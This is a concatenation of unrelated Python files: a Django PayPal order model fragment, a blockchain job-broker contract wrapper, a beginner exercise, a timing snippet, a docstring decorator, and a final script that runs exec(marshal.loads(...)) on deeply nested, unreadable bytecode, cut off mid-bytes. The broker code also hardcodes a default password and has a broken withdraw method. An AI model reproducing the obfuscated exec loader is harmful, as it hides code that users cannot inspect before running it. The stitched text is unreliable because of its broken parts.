This model is called simply "Order" in PayPal docs, but Paypal calls this resource
'checkout-order'
'''
payment_source = JSONField(default=dict)
intent = models.CharField(choices=ORDER_INTENT_CHOICES, max_length=24)
payer = JSONField(default=dict)
purchase_units = JSONField(default=list)
status = models.CharField(choices=ORDER_STATUS_CHOICES, max_length=24)
payer_model = models.ForeignKey(
'Payer', on_delete=models.SET_NULL, null=True, blank=True,
)
def save(self, **kwargs):
from .payer import Payer
# On save, get the payer_info object and do a best effort attempt at
# saving a Payer model and relation into the db.
payer_info = self.payer.get('payer_info', {})
if payer_info and 'payer_id' in payer_info:
# Copy the payer_info dict before mutating it
payer_info = payer_info.copy()
payer_id = payer_info.pop('payer_id')
payer_info['user'] = self.user
payer_info['livemode'] = self.livemode
self.payer_model, created = Payer.objects.update_or_create(
id=payer_id, defaults=payer_info
)
return super().save(**kwargs)
class Capture(PaypalModel):
'''
https://developer.paypal.com/docs/api/orders/v2/#definition-capture
This resource is sent to webhook when you try to capture CheckoutOrder
'''
status = models.CharField(choices=CAPTURE_STATUS_CHOICES, max_length=24)
status_details = JSONField(default=dict)
amount = CurrencyAmountField()
invoice_id = models.CharField(max_length=255, blank=True)
custom_id = models.CharField(max_length=127, blank=True)
seller_protection = JSONField()
final_capture = models.BooleanField()
seller_receivable_breakdown = JSONField()
disbursement_mode = models.CharField(choices=DISBURSEMENT_MODE_CHOICES,
max_length=24, blank=True)
supplementary_data = JSONField(default=dict)
|
#!/usr/bin/env python3
import sys
import time
from contextlib import suppress
from os.path import expanduser
from pathlib import Path
from typing import Union
from pymongo import MongoClient
from web3.exceptions import TransactionNotFound
from web3.types import TxReceipt
from broker import cfg
from broker._utils._log import ok
from broker._utils.tools import exit_after, log, print_tb, without_keys
from broker._utils.yaml import Yaml
from broker.config import env
from broker.errors import Web3NotConnected
from broker.libs.mongodb import MongoBroker
from broker.utils import ipfs_to_bytes32, terminate
from brownie.network.account import Account, LocalAccount
from brownie.network.transaction import TransactionReceipt
# from brownie.network.gas.strategies import LinearScalingStrategy
GAS_PRICE = 1.0
EXIT_AFTER = 120
class Contract:
"""Object to access smart-contract functions."""
def __init__(self, is_brownie=False) -> None:
"""Create a new Contrect."""
mc = MongoClient()
self.mongo_broker = MongoBroker(mc, mc["ebloc_broker"]["cache"])
# self.gas_limit = "max" # 300000
self.ops = {}
self.max_retries = 10
self.required_confs = 1
self._from = ""
#: Transaction cost exceeds current gas limit. Limit: 9990226, got:
# 10000000. Try decreasing supplied gas.
self.gas = 9980000
self.gas_price = GAS_PRICE
# self.gas_strategy = LinearScalingStrategy(f"{GAS_PRICE} gwei", "10 gwei", 1.1, time_duration=15)
# self.gas_params = {"gas_price": self.gas_strategy, "gas": self.gas}
self._setup(is_brownie)
self.invalid = {"logs", "logsBloom"}
with suppress(Exception):
self.deployed_block_number = self.get_deployed_block_number()
def _setup(self, is_brownie=False):
if is_brownie:
from brownie import web3
self.w3 = web3
else:
try:
from broker.imports import connect
self.eBlocBroker, self.w3, self._eBlocBroker = connect()
except Exception as e:
print_tb(e)
sys.exit(1)
ebb = None # contract object
# Imported methods
# ================
from broker.eblocbroker_scripts.authenticate_orc_id import authenticate_orc_id
from broker.eblocbroker_scripts.get_provider_info import get_provider_info
from broker.eblocbroker_scripts.process_payment import process_payment
from broker.eblocbroker_scripts.submit_job import submit_job
from broker.eblocbroker_scripts.submit_job import check_before_submit
from broker.eblocbroker_scripts.submit_job import is_provider_valid
from broker.eblocbroker_scripts.submit_job import is_requester_valid
from broker.eblocbroker_scripts.get_job_info import get_job_owner
from broker.eblocbroker_scripts.get_job_info import get_job_info
from broker.eblocbroker_scripts.get_job_info import get_job_info_print
from broker.eblocbroker_scripts.get_job_info import set_job_received_block_number
from broker.eblocbroker_scripts.get_job_info import update_job_cores
from broker.eblocbroker_scripts.get_job_info import analyze_data
from broker.eblocbroker_scripts.get_job_info import get_job_source_code_hashes
from broker.eblocbroker_scripts.get_requester_info import get_requester_info
from broker.eblocbroker_scripts.log_job import run_log_cancel_refund
from broker.eblocbroker_scripts.log_job import run_log_job
from broker.eblocbroker_scripts.register_provider import _register_provider
from broker.eblocbroker_scripts.refund import refund
from broker.eblocbroker_scripts.register_requester import register_requester
from broker.eblocbroker_scripts.update_provider_info import update_provider_info
from broker.eblocbroker_scripts.update_provider_prices import update_provider_prices
from broker.eblocbroker_scripts.transfer_ownership import transfer_ownership
from broker.eblocbroker_scripts.data import get_data_info
def brownie_load_account(self, fname="", password="alper"):
"""Load accounts from Brownie for Bloxberg."""
from brownie import accounts
cfg = Yaml(env.LOG_PATH / ".bloxberg_account.yaml")
if not fname:
fname = cfg["config"]["name"]
if cfg["config"]["passw"]:
password = cfg["config"]["passw"]
full_path = expanduser(f"~/.brownie/accounts/{fname}")
if not full_path:
raise Exception(f"{full_path} does not exist")
# accounts.load("alper.json", password="alper") # DELETE
return accounts.load(fname, password=password)
def is_eth_account_locked(self, addr):
"""Check whether the ethereum account is locked."""
if env.IS_BLOXBERG:
try:
account = self.brownie_load_account()
except Exception as e:
error_msg = f"E: PROVIDER_ID({env.PROVIDER_ID}) is locked, unlock it for futher use. \n{e}"
terminate(error_msg, is_traceback=True)
else:
for account in self.w3.geth.personal.list_wallets():
_address = account["accounts"][0]["address"]
if _address == addr:
if account["status"] == "Locked":
error_msg = f"E: PROVIDER_ID({_address}) is locked, unlock it for futher use"
terminate(error_msg, is_traceback=False)
def is_synced(self):
"""Check whether the web3 is synced."""
return self.w3.eth.syncing
def timenow(self) -> int:
return self.w3.eth.get_block(self.w3.eth.get_block_number())["timestamp"]
def _wait_for_transaction_receipt(self, tx_hash: str, compact=False, is_silent=False) -> TxReceipt:
"""Wait till the tx is deployed."""
tx_receipt = None
attempt = 0
poll_latency = 3
if not is_silent:
log(f"## Waiting for the transaction({tx_hash}) receipt... ", end="")
while True:
try:
tx_receipt = cfg.w3.eth.get_transaction_receipt(tx_hash)
except TransactionNotFound as e:
log()
log(f"warning: {e}")
except Exception as e:
print_tb(str(e))
tx_receipt = None
if tx_receipt and tx_receipt["blockHash"]:
break
if not is_silent:
log()
log(f"## attempt={attempt} | sleeping_for={poll_latency} seconds ", end="")
attempt += 1
time.sleep(poll_latency)
if not is_silent:
log(ok())
if not compact:
return tx_receipt
else:
return without_keys(tx_receipt, self.invalid)
def tx_id(self, tx):
"""Return transaction id."""
if env.IS_BLOXBERG:
return tx.txid
return tx.hex()
def get_deployed_block_number(self) -> int:
"""Return contract's deployed block number."""
try:
contract = self._get_contract_yaml()
except Exception as e:
print_tb(e)
return False
block_number = self.w3.eth.get_transaction(contract["tx_hash"]).blockNumber
if block_number is None:
raise Exception("E: Contract is not available on the blockchain, is it synced?")
return self.w3.eth.get_transaction(contract["tx_hash"]).blockNumber
def get_transaction_receipt(self, tx, compact=False):
"""Get transaction receipt.
Returns the transaction receipt specified by transactionHash.
If the transaction has not yet been mined returns 'None'
__ https://web3py.readthedocs.io/en/stable/web3.eth.html#web3.eth.Eth.get_transaction_receipt
"""
tx_receipt = self.w3.eth.get_transaction_receipt(tx)
if not compact:
return tx_receipt
else:
return without_keys(tx_receipt, self.invalid)
def is_web3_connected(self):
"""Return whether web3 connected or not."""
return self.w3.isConnected()
def account_id_to_address(self, address: str, account_id=None):
"""Convert account id into address."""
if address:
return self.w3.toChecksumAddress(address)
if isinstance(account_id, int):
try:
account = self.w3.eth.accounts[account_id]
return self.w3.toChecksumAddress(account)
except Exception as e:
raise Exception("E: Given index account does not exist, check .eblocpoa/keystore") from e
else:
raise Exception(f"E: Invalid account {address} is provided")
def _get_balance(self, account, _type="ether"):
if not isinstance(account, (Account, LocalAccount)):
account = self.w3.toChecksumAddress(account)
else:
account = str(account)
balance_wei = self.w3.eth.get_balance(account)
return self.w3.fromWei(balance_wei, _type)
def transfer(self, amount, from_account, to_account, required_confs=1):
tx = from_account.transfer(to_account, amount, gas_price=GAS_PRICE, required_confs=required_confs)
return self.tx_id(tx)
def get_block_number(self):
"""Retrun block number."""
return self.w3.eth.block_number
def is_address(self, addr):
try:
return self.w3.isAddress(addr)
except Exception as e:
print_tb(e)
raise Web3NotConnected from e
def _get_contract_yaml(self) -> Path:
try:
_yaml = Yaml(env.CONTRACT_YAML_FILE)
if env.IS_BLOXBERG:
return _yaml["networks"]["bloxberg"]
elif env.IS_EBLOCPOA:
return _yaml["networks"]["eblocpoa"]
except Exception as e:
raise e
def is_contract_exists(self) -> bool:
try:
contract = self._get_contract_yaml()
except Exception as e:
raise e
contract_address = self.w3.toChecksumAddress(contract["address"])
if self.w3.eth.get_code(contract_address) == "0x" or self.w3.eth.get_code(contract_address) == b"":
raise
log(f"==> contract_address={contract_address.lower()}")
return True
def print_contract_info(self):
"""Print contract information."""
print(f"address={self.eBlocBroker.contract_address}")
print(f"deployed_block_number={self.get_deployed_block_number()}")
##############
# Timeout Tx #
##############
@exit_after(EXIT_AFTER)
def timeout(self, func, *args):
"""Timeout deploy contract's functions.
brownie:
self.eBlocBroker.submitJob(*args, self.ops)
geth:
self.eBlocBroker.functions.submitJob(*args).transact(self.ops)
"""
method = None
try:
if env.IS_BLOXBERG:
fn = self.ops["from"].lower().replace("0x", "") + ".json"
self.brownie_load_account(fn)
method = getattr(self.eBlocBroker, func)
return method(*args, self.ops)
else:
method = getattr(self.eBlocBroker.functions, func)
return method(*args).transact(self.ops)
except AttributeError as e:
raise Exception(f"Method {method} not implemented") from e
def timeout_wrapper(self, method, *args):
for _ in range(self.max_retries):
self.ops = {
"gas": self.gas,
"gas_price": f"{self.gas_price} gwei",
"from": self._from,
"allow_revert": True,
"required_confs": self.required_confs,
}
try:
return self.timeout(method, *args)
except ValueError as e:
log(f"E: {e}")
if "Execution reverted" in str(e):
raise e
if "Transaction cost exceeds current gas limit" in str(e):
self.gas -= 10000
except KeyboardInterrupt:
log("warning: Timeout Awaiting Transaction in the mempool")
self.gas_price *= 1.13
################
# Transactions #
################
def _submit_job(self, required_confs, requester, job_price, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
for _ in range(self.max_retries):
self.ops = {
"gas": self.gas,
"gas_price": f"{self.gas_price} gwei",
"from": requester,
"allow_revert": True,
"value": self.w3.toWei(job_price, "wei"),
"required_confs": required_confs,
}
try:
return self.timeout("submitJob", *args)
except ValueError as e:
log(f"E: {e}")
if "Execution reverted" in str(e):
raise e
if "Transaction cost exceeds current gas limit" in str(e):
self.gas -= 10000
except KeyboardInterrupt as e:
if "Awaiting Transaction in the mempool" in str(e):
log("warning: Timeout Awaiting Transaction in the mempool")
self.gas_price *= 1.13
def withdraw(self, account) -> "TransactionReceipt":
"""Withdraw payment."""
self.gas_price = GAS_PRICE
self._from = self.w3.toChecksumAddress(account)
self.required_confs = 1
return self.timeout_wrapper("withdraw", *args)
def _register_requester(self, _from, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = _from
self.required_confs = 1
return self.timeout_wrapper("registerRequester", *args)
def _refund(self, _from, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = _from
self.required_confs = 1
return self.timeout_wrapper("refund", *args)
def _transfer_ownership(self, _from, new_owner) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = _from
self.required_confs = 1
return self.timeout_wrapper("transferOwnership", new_owner)
def _authenticate_orc_id(self, _from, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = _from
self.required_confs = 1
return self.timeout_wrapper("authenticateOrcID", *args)
def _update_provider_prices(self, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 1
return self.timeout_wrapper("updateProviderPrices", *args)
def _update_provider_info(self, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 1
return self.timeout_wrapper("updateProviderInfo", *args)
def register_provider(self, *args) -> "TransactionReceipt":
"""Register provider."""
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 1
return self.timeout_wrapper("registerProvider", *args)
def register_data(self, *args) -> "TransactionReceipt":
"""Register the dataset hash."""
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 1
return self.timeout_wrapper("registerData", *args)
def update_data_price(self, *args) -> "TransactionReceipt":
"""Register the dataset hash."""
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 1
return self.timeout_wrapper("updataDataPrice", *args)
def set_job_status_running(self, key, index, job_id, start_time) -> "TransactionReceipt":
"""Set the job status as running."""
_from = self.w3.toChecksumAddress(env.PROVIDER_ID)
self._from = _from
self.required_confs = 0
return self.timeout_wrapper("setJobStatusRunning", key, int(index), int(job_id), int(start_time))
def _process_payment(self, *args) -> "TransactionReceipt":
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 0
return self.timeout_wrapper("processPayment", *args)
def remove_registered_data(self, *args) -> "TransactionReceipt":
"""Remove registered data."""
self.gas_price = GAS_PRICE
self._from = env.PROVIDER_ID
self.required_confs = 0
return self.timeout_wrapper("removeRegisteredData", *args)
###########
# GETTERS #
###########
def get_registered_data_prices(self, *args):
if env.IS_BLOXBERG:
return self.eBlocBroker.getRegisteredDataPrice(*args)
else:
return self.eBlocBroker.functions.getRegisteredDataPrice(*args).call()
def get_provider_prices_blocks(self, account):
"""Return block numbers where provider info is changed.
First one is the most recent and latest one is the latest block number where
provider info is changed.
Ex: (12878247, 12950247, 12952047, 12988647)
"""
if env.IS_BLOXBERG:
return self.eBlocBroker.getUpdatedProviderPricesBlocks(account)
else:
return self.eBlocBroker.functions.getUpdatedProviderPricesBlocks(account).call()
def is_owner(self, address) -> bool:
"""Check if the given address is the owner of the contract."""
return address.lower() == self.get_owner().lower()
def _get_provider_prices_for_job(self, *args):
if env.IS_BLOXBERG:
return self.eBlocBroker.getProviderPricesForJob(*args)
else:
return self.eBlocBroker.functions.getProviderPricesForJob(*args).call()
def _get_job_info(self, *args):
if env.IS_BLOXBERG:
return self.eBlocBroker.getJobInfo(*args)
else:
return self.eBlocBroker.functions.getJobInfo(*args).call()
def get_user_orcid(self, user):
if env.IS_BLOXBERG:
return self.eBlocBroker.getUserOrcID(user)
else:
return self.eBlocBroker.functions.getUserOrcID(user).call()
def _get_requester_info(self, requester):
if env.IS_BLOXBERG:
committed_block_num = self.eBlocBroker.getRequesterCommittmedBlock(requester)
else:
committed_block_num = self.eBlocBroker.functions.getRequesterCommittmedBlock(requester).call()
return committed_block_num, self.get_user_orcid(requester)
def get_owner(self):
"""Return the owner of ebloc-broker."""
if env.IS_BLOXBERG:
return self.eBlocBroker.getOwner()
else:
return self.eBlocBroker.functions.getOwner().call()
def get_job_size(self, provider, key):
"""Return size of the job."""
if env.IS_BLOXBERG:
return self.eBlocBroker.getJobSize(provider, key)
else:
return self.eBlocBroker.call().getJobSize(provider, key)
def is_orcid_verified(self, address):
if env.IS_BLOXBERG:
return self.eBlocBroker.isOrcIDVerified(address)
else:
return self.eBlocBroker.functions.isOrcIDVerified(address).call()
def does_requester_exist(self, address):
"""Check whether the given Ethereum address of the requester address is registered."""
if not isinstance(address, (Account, LocalAccount)):
address = self.w3.toChecksumAddress(address)
if env.IS_BLOXBERG:
return self.eBlocBroker.doesRequesterExist(address)
else:
return self.eBlocBroker.functions.doesRequesterExist(address).call()
def does_provider_exist(self, address) -> bool:
"""Check whether the given provider is registered."""
if not isinstance(address, (Account, LocalAccount)):
address = self.w3.toChecksumAddress(address)
if env.IS_BLOXBERG:
return self.eBlocBroker.doesProviderExist(address)
else:
return self.eBlocBroker.functions.doesProviderExist(address).call()
def get_provider_receipt_node(self, provider_address, index):
"""Return provider's receipt node based on given index."""
if env.IS_BLOXBERG:
return self.eBlocBroker.getProviderReceiptNode(provider_address, index)
else:
return self.eBlocBroker.functions.getProviderReceiptNode(provider_address, index).call()
def get_provider_receipt_size(self, address):
"""Return provider receipt size."""
if not isinstance(address, (Account, LocalAccount)):
address = self.w3.toChecksumAddress(address)
if env.IS_BLOXBERG:
return self.eBlocBroker.getProviderReceiptSize(address)
else:
return self.eBlocBroker.functions.getProviderReceiptSize(address).call()
def _is_orc_id_verified(self, address):
if env.IS_BLOXBERG:
return self.eBlocBroker.isOrcIDVerified(address)
else:
return self.eBlocBroker.functions.isOrcIDVerified(address).call()
def _get_provider_info(self, provider, prices_set_block_number=0):
if env.IS_BLOXBERG:
block_read_from, provider_price_info = self.eBlocBroker.getProviderInfo(provider, prices_set_block_number)
else:
block_read_from, provider_price_info = self.eBlocBroker.functions.getProviderInfo(
provider, prices_set_block_number
).call()
return block_read_from, provider_price_info
def eth_balance(self, account):
"""Return account balance."""
return self.w3.eth.get_balance(account)
def get_balance(self, account):
if not isinstance(account, (Account, LocalAccount)):
account = self.w3.toChecksumAddress(account)
if env.IS_BLOXBERG:
return self.eBlocBroker.balanceOf(account)
else:
return self.eBlocBroker.functions.balanceOf(account).call()
def get_providers(self):
"""Return the providers list."""
if env.IS_BLOXBERG:
return self.eBlocBroker.getProviders()
else:
return self.eBlocBroker.functions.getProviders().call()
def _get_provider_set_block_numbers(self, provider):
if env.IS_BLOXBERG:
return self.eBlocBroker.getProviderSetBlockNumbers(provider)[-1]
else:
return self.eBlocBroker.functions.getProviderSetBlockNumbers(provider).call()[-1]
def get_job_storage_time(self, provider_addr, source_code_hash):
"""Return job storage duration time."""
if not isinstance(provider_addr, (Account, LocalAccount)):
provider_addr = self.w3.toChecksumAddress(provider_addr)
if isinstance(source_code_hash, str):
try:
source_code_hash = ipfs_to_bytes32(source_code_hash)
except:
pass
if env.IS_BLOXBERG:
return self.eBlocBroker.getJobStorageTime(provider_addr, source_code_hash)
else:
return self.eBlocBroker.functions.getJobStorageTime(provider_addr, source_code_hash).call()
def get_received_storage_deposit(self, provider, requester, source_code_hash):
"""Return received storage deposit for the corresponding source code hash."""
ops = {"from": provider}
if isinstance(source_code_hash, str):
try:
source_code_hash = ipfs_to_bytes32(source_code_hash)
except:
pass
if env.IS_BLOXBERG:
return self.eBlocBroker.getReceivedStorageDeposit(provider, requester, source_code_hash, ops)
else:
return self.eBlocBroker.functions.getReceivedStorageDeposit(provider, requester, source_code_hash).call(ops)
class EBB:
def __init__(self):
self.eblocbroker: Union[Contract, None] = None
def _set(self):
if not self.eblocbroker:
self.eblocbroker = Contract()
def set(self):
self._set()
def __getattr__(self, name) -> Contract:
"""Return eblocbroker object."""
self._set()
return getattr(self.eblocbroker, name)
# eblocbroker: Union["Contract", None] = None
Ebb = EBB()
|
# Create a program to assign one variable to other.
# • Create a variable named favorite_food with the value 'steak'.
favorite_food = 'steak'
# • Print the favorite_food variable.
print(favorite_food)
# • Create another variable named food with the value 'pizza'.
food = 'pizza'
# • Assign the food variable to the favorite_food variable.
favorite_food = food
# • Print the favorite_food variable again.
print(favorite_food)
|
# Prepare canvas 1 and 2
canvas1 = canvas(exp)
canvas1.text('This is the first canvas')
canvas2 = canvas(exp)
canvas2.text('This is the second canvas')
# Show canvas 1
t1 = canvas1.show()
# Sleep for 95 ms to get a 100 ms delay
self.sleep(95)
# Show canvas 2
t2 = canvas2.show()
# The actual delay will be 100 ms, because stimulus
# preparation time is not included. This is good!
print 'Actual delay: %s' % (t2-t1)
|
"""Utilties for documentation."""
def docstring_parameter(*args, **kwargs):
"""Decorator to parameterize docstrings.
Examples
--------
>>> @docstring_parameter('test', answer='Yes it does.')
... def do_nothing():
... '''Does this {} do anything? {answer}'''
... pass
>>> print(do_nothing.__doc__)
Does this test do anything? Yes it does.
"""
def dec(obj):
obj.__doc__ = obj.__doc__.format(*args, **kwargs)
return obj
return dec
|
#----------------------------------------
# Compile : H20studio
# Youtube : H20 Studio
#----------------------------------------
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf4Y\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsiY\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xdeX\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsSX\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc8W\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns=W\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb2V\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\'V\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9cU\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x11U\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x86T\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfbS\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NspS\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe5R\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsZR\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xcfQ\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsDQ\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb9P\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns.P\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa3O\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x18O\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8dN\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x02N\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NswM\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xecL\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsaL\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd6K\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x0